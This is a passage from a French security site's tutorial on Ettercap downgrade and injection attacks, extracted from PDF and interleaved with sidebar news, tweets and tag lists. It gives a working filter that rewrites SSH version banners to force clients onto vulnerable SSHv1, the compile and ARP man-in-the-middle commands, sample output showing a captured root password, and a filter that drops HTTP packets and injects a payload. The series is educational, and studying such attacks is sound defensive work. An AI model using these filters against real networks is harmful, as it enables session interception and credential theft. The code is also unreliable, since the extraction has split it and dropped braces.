1 sur 6 16/06/ :55

Transcription

1 1 sur 6 16/06/ :55 Chercher : Newsletter : Sponsors : Tutoriels Revues : - Presse - Presse FR - Vidéos - Twitter - Secuobs Les derniers commentaires publiés sur SecuObs (1-5): - New Chrome security features: Javascript PRNG, HSTS + cert pinning, CSP and more - - I've ported MBEnum to Nmap Most Frequently Used Linux IPTables Rules Examples - - DECT Sniffing with BackTrack Deobfuscate Javascript Using MS Tools Les derniers commentaires publiés sur SecuObs (6-25) Tous les commentaires publiés sur SecuObs avant les 5 derniers Sommaires : - Tendances - Failles - Virus - Concours - Reportages - Acteurs - Outils - Breves - Infrastructures - Livres - Tutoriels - Interviews - Podcasts - Communiques - USBsploit - Commentaires Revue Presse: English version with Google Translate [Ettercap Partie 3] Ettercap par l'exemple - Affaiblissement de protocoles et attaque par injection Par Moussa Diallo, secuobs.com Le 04/10/2006 Résumé : Présentation des attaques par affaiblissement de protocoles et des attaques par injection qui seront l'occasion d'expliquer le fonctionnement des filtres. Retrouvez également les principes d'utilisation des plugins dans Ettercap. - Lire l'article Version imprimable de cet article Suivre l'ensemble des commentaires SecuObs en RSS Suivre tous les commentaires de la categorie Tutoriels en RSS Attaques par affaiblissement de protocoles Parmi les fonctions avancées de Ettercap, une des possibilités les plus méconnues concerne les attaques par affaiblissement de protocole (downgrade attacks). Etant donné que l'attaquant est susceptible de se trouver au milieu de la connexion il peut intervenir au cours de la connexion sécurisée afin de forcer la victime à utiliser un protocole vulnérable. Nous allons prendre l'exemple de SSH. Aujourd'hui la version la plus répandue de SSH est la version 2. Si un client se connecte à un serveur en utilisant le protocole SSH v2 une attaque de Man In the Middle comme nous l avons vue précédemment ne fonctionnera pas ; Ettercap n implémentant pas d attaque Man In The Middle sur le protocole SSHv2, le seul outil à ma connaissance permettant ce type d attaque est jmim2. Cependant si le serveur accepte l'utilisation du protocole SSH v1 (connu pour être vulnérable à des attaques de Man In the Middle), un attaquant pourra récupérer les identifiants de connexions et déchiffrer les données échangées. L'astuce consiste à identifier le début d'une connexion SSH v2. Si le serveur supporte les protocoles SSH v1 et SSH v2 il répondra à la requête de connexion avec dans son en-tête la chaîne de caractère SSH Si le serveur ne supporte que le protocole SSH v1, il répondra avec dans son en-tête SSH L'attaquant peut donc modifier la réponse pour faire croire au client que le serveur ne supporte que le protocole SSH v1. Pour cela il peut réaliser un filtre afin de remplacer les caractères "1.99" par "1.51" afin d obliger le client à utiliser une version vulnérable du protocole. Le fonctionnement des filtres avec Ettercap. Ettercap permet d appliquer des filtres sur les paquets qui transitent afin de réaliser un certain nombre d'actions. On peut penser notamment à filtrer (chercher, Revue de presse francophone : - Bitcoin Botnet Mining - CERTA-2011-AVI-361 Vulnérabilité dans Google Chrome 16 juin Are You Sure You re Secure Online Take Our Survey - Enterasys Networks noue un partenariat avec Pelco by Schneider Electric pour le développement de la vidéosurveillance en réseau avec des caméras IP - BullGuard 53pourcents des utilisateurs de téléphones portables ne sont pas conscients des risques encourus sur leurs Smartphones - IBM fête ses cent ans - Editions Profil étend son réseau de grossistes en région - Modul'Data Center dévoile son datacenter modulaire le Modul'Room - Pédophilie. Saisie de vidéos de dizaines de milliers d enfants aux Etats-Unis - I-Trust Ingénieur développement supervision - Oktey, l'éditeur d'altospam vient de remporter le trophée de la performance commerciale du web business décerné par les DCF 31 - Vigilance - Noyau Linux quatre vulnérabilités de Alpha OSF - Emmanuelle Ribouleau nommée Directrice France et Benelux de Websense - Nouvelle offre MSSP chez Stonesoft - Gemalto remporte le prix A.T. Kearney du Meilleur innovateur d'articles en français de la revue de presse Dernier articles de SecuObs : - Petit déjeuner investigation numérique chez Arxsys - usbsploit_module.rb 0.1: use USBsploit as a module for Metasploit - Le stack grouping permet de contourner les mécanismes de protection du kernel Linux - usbsploit.rb 0.6b split into 3 scripts w/ MSF: custom infection to replace all original EXE and PDF - usbsploit.rb 0.6b w/ MSF: custom infection to replace all the original EXE and PDF files - USBsploit 0.6 BETA: using autosploit CLI to automate the infection of all original EXE & PDF files - USBsploit 0.6 BETA: Replace and infect all EXE and PDF with payload embedded into the original files - How to install USBsploit 0.6 BETA through SVN, the tar.gz, the.run or to work with original Metasploit - How to install USBsploit 0.5 BETA through SVN, the tar.gz, the.run or to work with original Metasploit - Video - usbsploit.rb 0.5b split into 3 scripts with Metasploit: Migration, Replacement, dump protection and Railgunonly against XP PRO

2 2 sur 6 16/06/ :55 - Tous - Francophone - Par site Top bi-hebdo: - Ensemble - Articles - Revue - Videos - Twitter - Auteurs Articles : - Par auteur - Par organisme Videos : - Toutes - Par site remplacer...) des chaînes de caractères, ou encore interagir directement au niveau des paquets pour les faire disparaître (drop) ou en injecter de nouveaux. La syntaxe est relativement simple puisqu'elle ressemble à du C. Un script est une succession d'instructions exécutées séquentiellement. Il est possible d'utiliser les instructions "if/else" (qui sont d'ailleurs les seules supportées. Voyons comment utiliser un script pour mettre en place l'attaque sur SSH. Le script suivant se trouve dans /usr/share/ettercap/ : if (ip.proto == TCP) { if (tcp.src == 22) { if ( replace("ssh-1.99", "SSH-1.51") ) { msg("[ssh Filter] SSH downgraded from version 2 to 1\n"); else { if ( search(data.data, "SSH-2.00") ) { msg("[ssh Filter] Server supports only SSH version 2\n"); else { if ( search(data.data, "SSH-1.51") ) { msg("[ssh Filter] Server already supports only version 1\n"); Il y a d'abord un filtrage sur le protocole et le port utilisés: + d'articles publiés par SecuObs Revue de presse internationale : - 11 Pathogens Pose Big Security Risk For Research - What Gets Redacted in Pacer - You re Still Buying Spy Gear for The Pakistanis - Deconstructing LTE 4G Testing - FFIEC New Guidance, New Security - Site Traffic Report for May 15 June Senators introduce national data breach notification legislation - A Year In The Life of the Moon - Following the Money In Cybercrime - Oracle Java Runtime Environment FileDialog.show Heap Buffer Oveflow Vulnerability - Oracle Java Soundbank Heap Buffer Overflow Vulnerability - Oracle Java Soundbank Stack Buffer Overflow - Security Breech of the Week Citigroup - Facebook Follies Fatigue Blamed for Shrinking User Base - Make Me One with Everything + d'articles mondiaux de la revue de presse Twitter : - Tous - Par compte Commentaires : - Breves - Virus - Failles - Outils - Tutoriels - Tendances - Acteurs - Reportages - Infrastructures - Interviews - Concours - Livres - Communiques RSS/XML : - Articles - Commentaires - Revue - Revue FR - Videos - Twitter RSS SecuObs : - sécurité - exploit - windows - microsoft - attaque - réseau RSS Revue : - security - microsoft - windows - hacker - attack - network if (ip.proto == TCP) { if (tcp.src == 22) { La fonction "replace()" va remplacer la chaîne de caractères "SSH-1.99" par la chaîne de caractères "SSH-1.51". Si tout a fonctionné jusque là, le message "[SSH Filter] SSH downgraded from version 2 to 1" est affiché. if ( replace("ssh-1.99", "SSH-1.51") ) { msg("[ssh Filter] SSH downgraded from version 2 to 1\n"); La suite du script n'est rien d'autre que des messages d'informations. Si l'on trouve la chaîne de caractère "SSH-2.00" on affiche un message qui informera l attaquant que le serveur ne supporte que le protocole SSH v2. if ( search(data.data, "SSH-2.00") ) { msg("[ssh Filter] Server supports only SSH version 2\n"); La variable "data" représente le buffer du paquet en cours. Il peut être de la forme "DATA.data" où il représente le payload de la couche donnée (au dessus de TCP/UDP) comme il est transmis sur le réseau ou de la forme "DECODED.data" où il représente le payload déchiffré par les dissecteurs de protocoles d Ettercap. Ainsi, si l'on souhaite faire une recherche dans une connexion SSH, il est préférable d'utiliser 'DECODED.data' puisque les données seront décodées par les dissecteurs d'ettercap. Avant que notre filtre soit fonctionnel il est nécessaire de le compiler afin qu'il soit interprétable par Ettercap. Pour cela l'outil etterfilter est fourni avec la suite Ettercap. L'utilisation est relativement simple puisqu'il suffit de lui indiquer le nom de notre fichier source puis le nom de notre binaire de sortie. Etterfilter etter.filter.ssh o etter.filter.ssh.ef L'attaquant est désormais en mesure de mettre en place son attaque sur le protocole SSH. Il se place en homme du milieu et charge le script de filtrage pour affaiblir le protocole SSH v2 en SSH v1. L utilisation d un script est indiqué à Ettercap avec l option F. Annuaire des videos - HoN account gets busted - Aluc TV Episode 1 Informaton Gathering with mobile Devices - Untitled - E Wrap Up Hak5 - E Wrap Up Hak5 - Rootkit test for Norton And Kaspersky virustotal com - wireshark i przechwytywanie sesji - Wellington Academy Biometric Solution - PHP The Anthem - ABRAHAM CARGO DEFCON 2 - What if Simulation of a large scale network under attack - Top 10 Security Issues Developers Don t Know About - USB Device Drivers A Stepping Stone into your Kernel - Weapons of Mass Pwnage Attacking Deployment Solutions - Windows Secure Kernel Development Revue Twitter + de videos de l'annuaire - The TidyFS MS Research paper: - probably interesting reading for SQL or Hadoop fans. - Microsoft SQL Server 2008/2008 R2 Analysis Services Operations Guide - Boing - (noun) The sound a lead makes, bouncing off your site for the marketing whitepaper that requires registration. - Microsoft 'rogue faction' adds better HTML5, JavaScript support to Visual Studio - Enterprises Still Plagued By SQL Injection Attacks - Dark Reading: AppSec's Josh Shaul quoted #sql - should i be proud? this is like the cissp of the pci world :) - A special shoutout to Adobe. The sheer volume of 0-days we patch every week is a good ROI for a full time Adobe patch pe...

3 3 sur 6 16/06/ :55 RSS Videos : - security - vmware - biometric - metasploit - virus - windows ettercap -Tq -M arp / / / / -F etter.filter.ssh.ef Lorsque la victime se connecte au serveur la chaîne de caractère "SSH-1.99" est filtrée et remplacée par "SSH-1.51", demandant ainsi au client d'utiliser la version 1 de SSH. Ce qui permet de récupérer les données échangées. - Good Morning Defcon will broadcast live from the con floor to your hotel room! News, interviews and other goodness! Follow... - GeoTrust founders offer free SSL: Ex-execs try to smack down rivals with free basic validation certificates Four IBM celebrating 100 years this week. + de tweets avec la revue Twitter RSS Twitter : - security - linux - botnet - attack - metasploit - cisco RSS Comments : - Breves - Virus - Failles - Outils - Tutoriels - Tendances - Acteurs - Reportages - Infrastructures - Interviews - Concours - Livres - Communiques RSS OPML : - Français - International [SSH Filter] SSH downgraded from version 2 to 1 SSH : :22 -> USER: root PASS: rf$4pev1/!* Cette attaque par affaiblissement de protocole peut également être mise en place contre d'autres protocoles ayant connu des problèmes de sécurité dans des versions antérieures (MSCHAP) Attaque par injection Les possibilités offertes par Ettercap d'analyser le contenu des flux transitant sur le réseau sont encore améliorées par ces capacités de filtrage. Comme nous l'avons vu, les filtres peuvent être configurés pour chercher et remplacer des chaînes de caractères au format texte ou hexadécimal avant de les ré-acheminer vers le destinataire final. On peut par exemple réaliser un filtre qui va remplacer la chaîne de caractère " par " dans toutes les trames à destination du port 53, ainsi toutes les requêtes DNS seront modifiées pour que la victime soient re-dirigée vers un site malicieux. On peut imaginer d'avantages de scénarios comme modifier les destinataires de mails ou l'injection de code dans des pages Web (javascript, trojans, virus...). L'exemple suivant montre l'injection d'un code javascript malveillant dans une session HTTP. Pour cela il faut intercepter une requête légitime d'un utilisateur vers un serveur Web, dropper la requête et injecter le paquet. Mini-Tagwall Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone + de mots clés pour la revue de presse Annuaires des videos : security, vmware, biometric, metasploit, virus, windows, botnet, password, defcon, attack, tutorial, lockpicking, exploit + de mots clés pour les videos Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall + de mots clés pour la revue Twitter # replace the entire packet with another if (ip.proto == TCP && tcp.src == 80) { drop(); #msg("dropping packet"); inject("./payload"); #msg ("packet injected"); Où payload est le paquet envoyé. Top bi-hebdo des articles de SecuObs - [IDS Snort Windows Partie 2] Installation et configuration - [Ettercap Partie 1] Introduction et rappels - La sécurité des clés USB mise à mal par USBDUMPER - Slowloris exploite, en Déni de Service, une faille de conception dans Apache 1.x et 2.x, Squid, dhttpd et GoAhead WebServer - Comment changer un mot de passe perdu pour un compte WINDOWS - USBDumper 2 nouvelle version nouvelles fonctions! - [Ettercap Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing - [IDS Snort Windows Partie 1] Introduction aux IDS et à SNORT - [Metasploit 2.x Partie 1] Introduction et présentation - [IDS Snort Windows Partie 3] Exemple de fichier de configuration Voir Le top bi-hebdo des articles de SecuObs en entier Autres ressources dans ce dossier [Ettercap Partie 1] Introduction et rappels - lien [Ettercap Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing - lien [Ettercap Partie 4] Contre mesure, conclusion et webographie - lien Top bi-hebdo de la revue de presse - Affaire d espionnage chez Safran ce qui s est réellement passé - taskhost.exe, viewdrive.exe - Nouveau dictionnaire WPA Livebox - Backtrack 5 sur clef usb chiffrée - SSTIC 2011, deuxième jour. - Activer l authentification forte sur GMail - ilivid Download Manager - Tous les utilisateurs d iphone sont pistés - SSTIC 2011, troisième jour. - Les secrets de la nouvelle cybercriminalité à la TV

4 4 sur 6 16/06/ :55 Les mots clés pour les articles publiés sur SecuObs : ettercap attaque Les articles de la revue de presse sur les mots clés : attaque Les videos sur SecuObs pour les mots clés : ettercap Voir tous les articles de "Moussa Diallo" publiés sur SecuObs (4 résultats) Voir tous les articles publiés par l'organisme "secuobs" sur SecuObs (836 résultats) Version imprimable de cet article Suivre l'ensemble des commentaires SecuObs en RSS Suivre tous les commentaires de la categorie Tutoriels en RSS - Article suivant : [Ettercap Partie 4] Contre-mesures, conclusion et webographie - Article précédent : [Ettercap Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing - Article suivant dans la catégorie Tutoriels : [Ettercap Partie 4] Contre-mesures, conclusion et webographie - Article précédent dans la catégorie Tutoriels : [Ettercap Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing Voir Le top bi-hebdo de la revue de presse en entier Top bi-hebdo de l'annuaire des videos - VMware View vs. Citrix XenDesktop: Creating a Full Clone Desktop Pool - How to Add A WinPE WIM Image - Comment creer un server botnet!!!!(réseau de pc zombies) - BT Hacking FastTrack Tutorial - How To Hack WEP Keys Using Backtrack 4 - Metasploit vs Adobe PDF - How To Install Backtrack 5 ARM on Droid Incredible Part 1 - HOWTO Build a Multibootable USB Drive For Free HakTip - Metasploit Backdoor Crypted FUD - Ch0ry Euro iphone 3G 3GS 30 Hack WIFI key Voir Le top bi-hebdo de l'annuaire des videos en entier Les derniers commentaires de la catégorie Tutoriels: - - I've ported MBEnum to Nmap... - UPDATE Inguma v OpenBSD libc glob GLOB_APPEND and GLOB_DOOFFS Flags Multiple Integer Overflow Vulnerabilities... - Metasploit Revision 12931: Initial Linux Post Module to detect is target host is a Hyper-V, Xen, VMware, Qem... - Metasploit Revision 12915: Fresh meterpreter binaries, including a 64-bit version of the sniffer extension... Les derniers articles de la catégorie Tutoriels : - PktAnon un framework pour l anonymat des traces PCAP - [NessusWX Partie 2] Audits et conclusion - [NessusWX Partie 1] Introduction, installation et configuration - [IDS Snort Windows Partie 4] Conclusion et webographie - [IDS Snort Windows Partie 3] Exemple de fichier de configuration - [IDS Snort Windows Partie 2] Installation et configuration - [IDS Snort Windows Partie 1] Introduction aux IDS et à SNORT - [Sécurité et PHP - Partie 5] Astuces - [Sécurité et PHP - Partie 4] Remote PHP Vulnerabilty Scanner - [Sécurité et PHP - Partie 3] Les failles PHP + d'articles de la catégorie Tutoriels Top bi-hebdo de la revue Twitter - DEFCON 19 CTF Quals: writeups collection - New Nmap HTTP brute scripts - Joomla - and Wordpress - - FYI... making the Chrome browser use Google Secure Search by default is really easy, - Metasploit Unleashed has been released on PDF. Awesome sauce! - ElcomSoft Releases a Free Facebook Password Recovery Tool - HASHCRACK.COM - Reverse Hash Lookup for MD5, SHA1, MySQL, NTLM and Lanman-Password-Hashes: - The perl script to slow down nmap Could be fun to do the same in #suricata ;) #sstic - 25 Most Frequently Used Linux IPTables Rules Examples - Attackers using white-space obfuscation in a PHP/JS-based malware old but seems still very effective. #infosec #malware - A new John the Ripper release. Support added for PDF, SSH, RAR. Voir Le top bi-hebdo de la revue Twitter en entier Les derniers commentaires publiés sur SecuObs (6-25): - Adobe releases patches, Tue, Jun 14th - Microsoft June 2011 Black Tuesday Overview, Tue, Jun 14th - UPDATE Inguma v0.3 - Skipfish 1.94b Released - TAILS Released - UPDATE Complemento UPDATE The Sleuth Kit v OpenBSD libc glob GLOB_APPEND and GLOB_DOOFFS Flags Multiple Integer Overflow Vulnerabilities - He also point some LPC 0day information if you able to read Chinese - Yuange point out an GC algorithm flaw in IE 9, disclosure memory information, defeat ASLR - UPDATE Samurai Web Testing Framework Metasploit Revision 12931: Initial Linux Post Module to detect is target host is a Hyper-V, Xen, VMware, Qem - Metasploit Revision 12915: Fresh meterpreter binaries, including a 64-bit version of the sniffer extension - Metasploit Feature #4712 (New): New Module Submission: DHCP Exhaustion - Metasploit Feature #4711 (New): New Module Submission: DNS MITM - Add msfrop, a tool for collecting and ROP gadgets, features include export import in CSV format, regex searching - - Remote DLL Injection with Meterpreter Capture a network trace in ESXi using tcpdump-uw - Great guide on installing NeXpose in Amazon EC2 - Ubuntu Laika an Android phone pen testing platform Top des articles les plus commentés - [Metasploit 2.x Partie 1] Introduction et présentation - Microsoft!Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques - Webshag, un outil d'audit de serveur web - Les navigateurs internet, des mini-systèmes d exploitation hors de contrôle? - CAINE un Live[CD USB] pour faciliter la recherche légale de preuves numériques de compromission - Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G - Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation - [Renforcement des fonctions de sécurité du noyau Linux Partie 1] Présentation - [IDS Snort Windows Partie 1] Introduction aux IDS et à SNORT - Origami pour forger, analyser et manipuler des fichiers PDF malicieux Voir le top des plus commentés en entier

5 5 sur 6 16/06/ :55 Les cinq derniers commentaires publiés sur SecuObs Tous les commentaires publiés sur SecuObs avant les 25 derniers SecuToolBox : Bluetooth Stack Smasher v0.6 / Bluetooth Stack Smasher v0.8 / Slides Bluetooth Eurosec 2006 / Exposé vidéo Windows Shellcode - Kostya Kortchinsky / Exposé audio Reverse Engineering - Nicolas Brulez / Exposé vidéo Securitech - Pierre Betouin / WEP aircrack + Ubiquiti (MadWifi) 300 mw + Yagi / Secure WIFI WPA + EAP-TLS + Freeradius / Audit Windows / Captive Password Windows / USBDumper / USBDumper 2 / Hacking Hardware / WishMaster backdoor / DNS Auditing Tool / Ettercap SSL MITM / Exploit vulnérabilités Windows / Memory Dumper Kernel Hardening / Reverse Engineering / Scapy / SecUbuLIVE CD / Metasploit / eeye Blink Sec Center / eeye Retina Scanner + d'outils / + de tutoriels Mini-Tagwall des articles publiés sur SecuObs : sécurité, exploit, windows, microsoft, attaque, réseau, metasploit, outil, vulnérabilité, audit, système, virus, usbsploit, internet, données, linux, présentation, protocol, source, bluetooth, vista, scanner, reverse, réseaux, shell, meterpreter, conférence, rootkit, engineering, wishmaster, paquet, trames, téléphone, noyau, mobile, sysun, botnet, rapport, https, mémoire, téléphones, libre, intel, contourner, malveillant + de mots clés avec l'annuaire des articles publiés sur SecuObs Mini-Tagwall de l'annuaire video : security, vmware, biometric, metasploit, virus, windows, botnet, password, defcon, attack, tutorial, lockpicking, exploit, linux, network, crypt, source, iphone, conference, rootkit, server, shmoocon, secconf, conficker, engineering, wireshark, ettercap, virtual, wimax, internet, reverse, hnncast, cisco, hackitoergosum, meterpreter, openvpn, systm, wireless, firewall, openssh, access, openbsd, backtrack, hacker, inject + de mots clés avec l'annuaire des videos Mini-Tagwall des articles de la revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité + de mots clés avec l'annuaire de la revue de presse Mini-Tagwall des Tweets de la revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, , password, adobe, apache, proxy, backtrack + de mots clés avec l'annuaire de la revue Twitter

6 6 sur 6 16/06/ :55